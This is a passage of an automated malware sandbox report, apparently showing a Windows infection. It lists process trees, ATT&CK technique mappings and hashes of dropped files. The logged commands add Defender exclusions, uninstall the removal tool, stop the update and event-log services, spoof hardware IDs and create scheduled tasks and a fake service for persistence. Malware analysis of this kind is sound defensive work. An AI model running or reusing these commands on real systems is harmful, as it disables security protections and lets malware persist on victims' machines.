      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:2448
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 829679HP-TRGT14422SG
        5⤵
        
        PID:1760
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:2444
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:480
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:2760
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 529679HP-TRGT14422SL
        5⤵
        
        PID:1876
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:2276
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 429679HP-TRGT14422FA
        5⤵
        
        PID:400
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:1664
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 629679HP-TRGT14422FU
        5⤵
        
        PID:1680
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:1120
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 329679HP-TRGT14422DQ
        5⤵
        
        PID:1356
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:1600
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 729679HP-TRGT14422MST
        5⤵
        
        PID:2320
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:1044
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:1496
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS %RANDOM%HP-TRGT%RANDOM%AB
      4⤵
      PID:2388
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SS 29698HP-TRGT13377AB
        5⤵
        
        PID:3064
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 2%RANDOM%HP-TRGT%RANDOM%RV
      4⤵
      PID:2624
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SV 229698HP-TRGT13377RV
        5⤵
        
        PID:2288
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 8%RANDOM%HP-TRGT%RANDOM%SG
      4⤵
      PID:1976
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 829698HP-TRGT13377SG
        5⤵
        
        PID:1716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
      4⤵
      PID:2980
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SU auto
        5⤵
        
        PID:1208
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 5%RANDOM%HP-TRGT%RANDOM%SL
      4⤵
      PID:1552
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SK 529698HP-TRGT13377SL
        5⤵
        
        PID:2716
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 4%RANDOM%HP-TRGT%RANDOM%FA
      4⤵
      PID:1268
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BM 429698HP-TRGT13377FA
        5⤵
        
        PID:2544
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 6%RANDOM%HP-TRGT%RANDOM%FU
      4⤵
      PID:1540
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BS 629698HP-TRGT13377FU
        5⤵
        
        PID:2180
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 3%RANDOM%HP-TRGT%RANDOM%DQ
      4⤵
      PID:2684
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /BV 329698HP-TRGT13377DQ
        5⤵
        
        PID:3012
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 7%RANDOM%HP-TRGT%RANDOM%MST
      4⤵
      PID:2500
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /PSN 729698HP-TRGT13377MST
        5⤵
        
        PID:2104
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
      4⤵
      PID:2780
    - - C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
        
        C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe /SM HOPESA-RSPPOF
        5⤵
        
        PID:2016
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: TEU1-P7SO
      4⤵
      PID:2580
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe a: TEU1-P7SO
        5⤵
        
        PID:2800
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z475-971Z
      4⤵
      PID:904
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe b: Z475-971Z
        5⤵
        
        PID:2548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 6LLF-9AS2
      4⤵
      PID:1544
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe c: 6LLF-9AS2
        5⤵
        
        PID:2060
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: DSC2-O1OC
      4⤵
      PID:1448
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe d: DSC2-O1OC
        5⤵
        
        PID:2100
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 6N4V-TZ79
      4⤵
      PID:1528
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe e: 6N4V-TZ79
        5⤵
        
        PID:2840
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: KCCJ-797I
      4⤵
      PID:2384
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe f: KCCJ-797I
        5⤵
        
        PID:2976
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: JA9R-911N
      4⤵
      PID:3012
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe g: JA9R-911N
        5⤵
        
        PID:3064
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SRC8-GGJL
      4⤵
      PID:320
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe h: SRC8-GGJL
        5⤵
        
        PID:2468
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: ZI46-4VS3
      4⤵
      PID:2912
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe i: ZI46-4VS3
        5⤵
        
        PID:1652
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: EA20-5HRZ
      4⤵
      PID:2480
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe j: EA20-5HRZ
        5⤵
        
        PID:2816
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 9TOU-GSJZ
      4⤵
      PID:1780
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe k: 9TOU-GSJZ
        5⤵
        
        PID:2888
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 7280-JFFS
      4⤵
      PID:1388
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe l: 7280-JFFS
        5⤵
        
        PID:812
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 9SGE-NSA5
      4⤵
      PID:1076
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe m: 9SGE-NSA5
        5⤵
        
        PID:2504
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: DP40-0ILR
      4⤵
      PID:2968
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe n: DP40-0ILR
        5⤵
        
        PID:2868
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: R35G-N832
      4⤵
      PID:1604
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe o: R35G-N832
        5⤵
        
        PID:2600
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 5BSM-RS21
      4⤵
      PID:1904
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe p: 5BSM-RS21
        5⤵
        
        PID:2744
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EV1E-60TZ
      4⤵
      PID:2192
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe r: EV1E-60TZ
        5⤵
        
        PID:3056
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: THUO-2GB8
      4⤵
      PID:2916
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe s: THUO-2GB8
        5⤵
        
        PID:2228
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 97ZN-DA9N
      4⤵
      PID:3040
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe t: 97ZN-DA9N
        5⤵
        
        PID:1616
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 5PT2-V1D6
      4⤵
      PID:316
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe u: 5PT2-V1D6
        5⤵
        
        PID:1284
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGZ-OCVT
      4⤵
      PID:2524
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe v: ZKGZ-OCVT
        5⤵
        
        PID:2756
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: Z29C-MI00
      4⤵
      PID:1984
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe y: Z29C-MI00
        5⤵
        
        PID:1912
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 1NC1-8S17
      4⤵
      PID:2800
    - - C:\ProgramData\Microsoft\Windows\Volumeid64.exe
        
        C:\ProgramData\Microsoft\Windows\Volumeid64.exe z: 1NC1-8S17
        5⤵
        
        PID:688
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.cfg
      4⤵
      PID:2652
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.chm
      4⤵
      PID:1360
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\DevManView.exe
      4⤵
      PID:2748
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amide.sys
      4⤵
      PID:2548
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\amifldrv64.sys
      4⤵
      PID:1588
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\AMIDEWINx64.exe
      4⤵
      PID:1172
  - - C:\Windows\System32\cmd.exe
      "C:\Windows\System32\cmd.exe" /C del C:\ProgramData\Microsoft\Windows\Disk.bat
      4⤵
      PID:2724
- - C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe
    "C:\Users\Admin\AppData\Roaming\sphyperRuntimedhcpSvc.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:1504
  - - C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe
      "C:\Users\Admin\AppData\Roaming\.sphyperRuntimedhcpSvc.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:612
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\spoolsv.exe'
        5⤵
        
        PID:1752
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe'
        5⤵
        
        PID:2288
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\tracing\audiodg.exe'
        5⤵
        
        PID:1744
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\explorer.exe'
        5⤵
        
        PID:2056
    - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\All Users\Start Menu\winlogon.exe'
        5⤵
        
        PID:2548
    - - C:\Windows\System32\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\q2918b5msI.bat"
        5⤵
        
        PID:2400
      - C:\Windows\system32\chcp.com
        
        chcp 65001
        6⤵
        
        PID:1016
      - C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        6⤵
        Runs ping.exe
        
        PID:1652
      - C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe
        
        "C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe"
        6⤵
        
        PID:2292
- - C:\Users\Admin\AppData\Roaming\conhostsft.exe
    "C:\Users\Admin\AppData\Roaming\conhostsft.exe"
    3⤵
    - Executes dropped EXE
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:552
  - - C:\Users\Admin\AppData\Roaming\.conhostsft.exe
      "C:\Users\Admin\AppData\Roaming\.conhostsft.exe"
      4⤵
      Executes dropped EXE
      PID:1076
    - - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
        
        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
        5⤵
        
        PID:1708
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
        5⤵
        
        PID:3056
      - C:\Windows\system32\wusa.exe
        
        wusa /uninstall /kb:890830 /quiet /norestart
        6⤵
        
        PID:880
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop UsoSvc
        5⤵
        Launches sc.exe
        
        PID:588
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop WaaSMedicSvc
        5⤵
        Launches sc.exe
        
        PID:1748
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop wuauserv
        5⤵
        Launches sc.exe
        
        PID:2916
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop bits
        5⤵
        Launches sc.exe
        
        PID:2304
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop dosvc
        5⤵
        Launches sc.exe
        
        PID:2512
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
        5⤵
        
        PID:1576
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
        5⤵
        
        PID:2296
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
        5⤵
        
        PID:2680
    - - C:\Windows\system32\powercfg.exe
        
        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
        5⤵
        
        PID:1772
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe delete "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:2524
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe create "driverupdate" binpath= "C:\ProgramData\VC_redist.x64.exe" start= "auto"
        5⤵
        Launches sc.exe
        
        PID:2756
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe stop eventlog
        5⤵
        Launches sc.exe
        
        PID:1628
    - - C:\Windows\system32\sc.exe
        
        C:\Windows\system32\sc.exe start "driverupdate"
        5⤵
        Launches sc.exe
        
        PID:1956

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe shell32.dll,SHCreateLocalServerRunDll {995C996E-D918-4a8c-A302-45719A6F4EA7} -Embedding
1⤵
PID:1808

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\spoolsv.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2416

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsv" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:676

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "spoolsvs" /sc MINUTE /mo 11 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\spoolsv.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1820

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 8 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1980

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "Idle" /sc ONLOGON /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2188

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "IdleI" /sc MINUTE /mo 11 /tr "'C:\Program Files (x86)\Microsoft Sync Framework\v1.0\Runtime\x86\resources\Idle.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2764

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 10 /tr "'C:\Windows\tracing\audiodg.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:344

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodg" /sc ONLOGON /tr "'C:\Windows\tracing\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1632

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "audiodga" /sc MINUTE /mo 12 /tr "'C:\Windows\tracing\audiodg.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1692

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 6 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\explorer.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1828

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorer" /sc ONLOGON /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1792

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "explorere" /sc MINUTE /mo 9 /tr "'C:\Recovery\77984722-d108-11ee-bdd4-c695cbc44580\explorer.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:1996

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 9 /tr "'C:\Users\All Users\Start Menu\winlogon.exe'" /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2296

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogon" /sc ONLOGON /tr "'C:\Users\All Users\Start Menu\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2832

C:\Windows\system32\schtasks.exe
schtasks.exe /create /tn "winlogonw" /sc MINUTE /mo 6 /tr "'C:\Users\All Users\Start Menu\winlogon.exe'" /rl HIGHEST /f
1⤵
- Process spawned unexpected child process
- Creates scheduled task(s)
PID:2260

C:\Windows\system32\conhost.exe
\??\C:\Windows\system32\conhost.exe "1029605039-308785462-810457508965342920-6388582231014159632-5616518231907342132"
1⤵
PID:2484

C:\ProgramData\VC_redist.x64.exe
C:\ProgramData\VC_redist.x64.exe
1⤵
PID:1984
- C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
  2⤵
  PID:2108
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
  2⤵
  PID:564
- - C:\Windows\system32\wusa.exe
    wusa /uninstall /kb:890830 /quiet /norestart
    3⤵
    PID:2916
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop UsoSvc
  2⤵
  - Launches sc.exe
  PID:2012
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop WaaSMedicSvc
  2⤵
  - Launches sc.exe
  PID:2604
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop wuauserv
  2⤵
  - Launches sc.exe
  PID:1616
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop bits
  2⤵
  - Launches sc.exe
  PID:316
- C:\Windows\system32\sc.exe
  C:\Windows\system32\sc.exe stop dosvc
  2⤵
  - Launches sc.exe
  PID:348
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
  2⤵
  PID:2296
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
  2⤵
  PID:2452
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
  2⤵
  PID:1772
- C:\Windows\system32\powercfg.exe
  C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
  2⤵
  PID:3052
- C:\Windows\system32\conhost.exe
  C:\Windows\system32\conhost.exe
  2⤵
  PID:1596

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Scheduled Task/Job

T1053

Persistence

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Privilege Escalation

Create or Modify System Process

T1543

Windows Service

T1543.003

Scheduled Task/Job

T1053

Defense Evasion

Impair Defenses

T1562

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

C:\ProgramData\Microsoft\Windows\DevManView.cfg

Filesize
1KB

MD5
43b37d0f48bad1537a4de59ffda50ffe

SHA1
48ca09a0ed8533bf462a56c43b8db6e7b6c6ffa8

SHA256
fc258dfb3e49be04041ac24540ef544192c2e57300186f777f301d586f900288

SHA512
cfb1d98328aed36d2fe9df008a95c489192f01d4bb20de329e69e0386129aff4634e6fd63a8d49e14fc96da75c9b5ed3a218425846907d0122267d50fc8d7a82

Download Submit
C:\ProgramData\Microsoft\Windows\Disk.bat

Filesize
1KB

MD5
250e75ba9aac6e2e9349bdebc5ef104e

SHA1
7efdaef5ec1752e7e29d8cc4641615d14ac1855f

SHA256
7d50c4fdcf6d8716c7d0d39517d479b3eeee02d2020ed635327405ae49c42516

SHA512
